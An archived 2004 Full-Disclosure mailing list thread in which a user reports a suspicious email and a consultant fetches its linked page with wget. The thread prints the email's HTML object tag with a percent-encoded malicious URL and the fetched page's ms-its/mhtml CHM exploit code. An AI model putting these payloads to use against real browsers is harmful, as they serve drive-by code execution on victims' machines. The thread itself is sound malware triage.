lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: tremaine at gmail.com (Tremaine)
Subject: new email virus?

On Wed, 25 Aug 2004 14:37:18 -0400, John Nagro <john.nagro@...il.com> wrote:
> my co-worker got this in their email today... here is the body + some
> headers + the attachment... could this be a new virus? anyone else see
> anything like this?
> 
> MIME-Version: 1.0
> Content-Type: multipart/mixed;
>        boundary="--------fthllkqoljuvkhyckltf"
> X-YAVR: XML-CODEBASE
> Subject: WARNING-XML-CODEBASE-OBJECT-2
> 
> ----------fthllkqoljuvkhyckltf
> Content-Type: text/html; charset="us-ascii"
> Content-Transfer-Encoding: 7bit
> 
> <html><body>
> <object  data="http://www.v%69k%6F%72d.com/default.htm"><br><br>
> 
> <br>
> </body></html>
> 
> ----------fthllkqoljuvkhyckltf
> Content-Type: application/octet-stream; name="1.gif"
> Content-Transfer-Encoding: base64
> Content-Disposition: attachment; filename="1.gif"
> 
> NDU0NTEyMTI=
> 
> ----------fthllkqoljuvkhyckltf--
> ------------------------------------------------------------------------
> 
> --
> John Nagro
> john.nagro@...il.com
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html


Quick snag with wget:

wget http://www.v%69k%6F%72d.com/default.htm
--14:26:50--  http://www.vikord.com/default.htm
           => `default.htm'
Resolving www.vikord.com... 194.226.217.167
Connecting to www.vikord.com[194.226.217.167]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

    [ <=>                                           ] 350           --.--K/s

14:26:56 (3.34 MB/s) - `default.htm' saved [350]

username@...oner ~ $ cat default.htm
<textarea id="code" style="display:none;">
    <object data="&#109;s-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.chm::/default.htm"
type="text/x-scriptlet"></object>
</textarea>

<script language="javascript">
    document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('default.htm'))));
</script>

Feel free to keep digging

-- 
Tremaine
IT Security Consultant

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ